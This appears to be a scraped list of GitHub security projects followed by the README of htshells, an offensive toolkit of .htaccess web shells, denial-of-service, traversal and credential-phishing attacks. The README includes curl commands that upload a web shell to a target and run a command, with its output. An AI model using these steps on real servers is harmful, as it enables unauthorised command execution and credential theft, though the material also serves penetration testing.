Project Name | Stars | Downloads | Repos Using This | Packages Using This | Most Recent Commit | Total Releases | Latest Release | Open Issues | License | Language |
---|---|---|---|---|---|---|---|---|---|---|
Openrasp | 2,450 | 2 months ago | 13 | January 22, 2022 | 43 | apache-2.0 | C++ | |||
🔥Open source RASP solution | ||||||||||
Htshells | 801 | a year ago | 1 | gpl-3.0 | Shell | |||||
Self contained htaccess shells and attacks | ||||||||||
Rogue Jndi | 769 | a year ago | 7 | mit | Java | |||||
A malicious LDAP server for JNDI injection attacks | ||||||||||
Dhcpwn | 639 | 3 | 5 years ago | 4 | June 04, 2018 | gpl-3.0 | Python | |||
All your IPs are belong to us. | ||||||||||
Ssti Payloads | 465 | a month ago | mit | |||||||
🎯 Server Side Template Injection Payloads | ||||||||||
Raven Storm | 389 | 2 years ago | n,ull | other | Python | |||||
Raven-Storm is a powerful DDoS toolkit for penetration tests, including attacks for several protocols written in python. Takedown many connections using several exotic and classic protocols. | ||||||||||
Pina Colada | 261 | 4 years ago | 34 | mit | Python | |||||
A powerful and extensible wireless drop box | ||||||||||
Secureserver | 125 | 6 years ago | 2 | mit | Go | |||||
A Simple, Secured Default HTTP(S) Server for Golang | ||||||||||
Copycat | 103 | 6 years ago | 1 | JavaScript | ||||||
Universal MITM web server | ||||||||||
Heartbeat | 102 | 9 years ago | 2 | Ruby | ||||||
Ruby script to test your server for the TLS Heartbleed attack. |
HTSHELLS - Self contained web shells and other attacks via .htaccess files.
Attacks are named in the following fashion, module.attack.htaccess and grouped by attack type in directories. Pick the one you need and copy it to a new file named .htaccess, check the file to see if it needs editing before you upload it. Web shells executes commands from the query parameter c, unless the file states otherwise.
To prepare run ./prepare.sh file
which will generate the .htaccess file
to be uploaded. Example:
$ ./prepare.sh shell/mod_php.shell.htaccess
┬ ┬┌┬┐┌─┐┬ ┬┌─┐┬ ┬ ┌─┐
├─┤ │ └─┐├─┤├┤ │ │ └─┐
┴ ┴ ┴ └─┘┴ ┴└─┘┴─┘┴─┘└─┘
justanotherhacker.com
.htaccess file is ready
$ curl -F '[email protected]' -k https://target/upload.php
$ curl -k https://target/uploads/.htaccess?c=id
...
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
== DOS/ # Denial of service attacks
apache.dos.htaccess Makes all requests return a 500 internal server error
mod_rewrite.dos.htaccess Regular expression dos condition in mod_rewrite consumes a child process
== INFO/ # Information disclosure attacks
modcheck/ Include additional response headers to indicate which Apache modules are active
mod_caucho.info.htaccess untested Server status binding for the mod_caucho Resin java server module
mod_clamav.info.htaccess Clamav status page binding
mod_info.info.htaccess Server info binding for Apache
mod_ldap.info.htaccess untested Server status binding for the mod_ldap server module
mod_perl.info.htaccess Display the mod_perl status page
mod_php.info.htaccess Make all php pages show source instead of executing
mod_status.info.htacces Server status binding for Apache
== SHELL/ # Interactive command execution
mod_caucho.shell.htaccess untested JSP based web shell
mod_cgi.shell.bash.htaccess Shell using bash under the cgi handler, Requires exec flag to be set on the htaccess file.
mod_cgi.shell.windows.htaccess untested Gives shell through php.exe via apache cgi configuration directives
mod_include.shell.htaccess Server Side Include based web shell
mod_multi.shell.htaccess Multiple shells in one .htaccess file, one attack fits all approach
mod_perl.shell.htaccess incomplete TODO
mod_php.shell.htaccess PHP based web shell access via http://domain/path/.htaccess?c=command
mod_php.shell2.htaccess Alternate method of invoking a php shell from .htaccess file
mod_php.stealth.shell.htaccess PHP based stealth backdoor - see http://www.justanotherhacker.com/2011/12/writing-a-stealth-web-shell.html for tutorial
mod_python.shell.htaccess
mod_ruby.shell.htaccess
mod_suphp.shell.htaccess
== TRAVERSAL/ # Directory traversal attacks
mod_hitlog.traversal.htaccess Directory traversal attack via hitlog module tries to read /etc/passwd
mod_layout.traversal.htaccess Directory traversal attack reads /etc/passwd
== ./ # Various attacks
mod_auth_remote.phish.htaccess untested Forward basic auth credentials to server of your choice
mod_badge.admin.htaccess mod_badge admin page binding
mod_sendmail.rce.htaccess untested Executes commands configured in the .htaccess file by specifying path and arguments to "sendmail" binary
Wireghoul - http://www.justanotherhacker.com